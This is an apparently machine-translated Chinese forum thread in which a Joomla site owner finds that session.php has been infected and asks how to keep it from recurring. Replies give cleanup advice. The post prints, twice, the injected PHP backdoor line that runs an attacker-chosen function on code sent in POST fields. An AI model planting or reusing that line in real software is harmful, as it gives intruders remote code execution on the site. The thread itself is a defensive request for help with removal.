Joomla:由于病毒，session.php的权限更改为000

我们的一个网站每天都会出现错误500，在检查错误日志后，我发现/home/cadactdi/public_html/libraries/joomla/session/session.php中文件的权限被自己更改为000

检查实用程序端口80时，我发现会话文件被某种病毒感染，但没有关于如何清除它的详细信息

因此，由于更新不是一个选项，我每天都在自己更改权限，但他们在第二天又回到了000

我阅读了会话文件，在文件开头发现了以下代码：

if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}



if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}

因此，我删除了这些行，病毒扫描程序这次没有发现任何威胁，我认为这是固定的，但是，我不确定这是否会再次发生，如果任何病毒可以修改该文件，以及如何防止它

有人有过同样的问题吗？建议是什么

---

谢谢你的帮助

删除未使用的任何第三方扩展

使用可靠的商业服务（如sucuri.net或myjoomla.com）将Joomla和剩余的第三方扩展更新至最新版本，包括where apoplicable和rescan for any malware

使用，检查是否安装了任何易受攻击的扩展，并删除发现的任何扩展

禁用或删除未使用的用户帐户

---

重置管理员帐户、主机控制面板和数据库密码也可能是明智之举。

非常感谢！我正在检查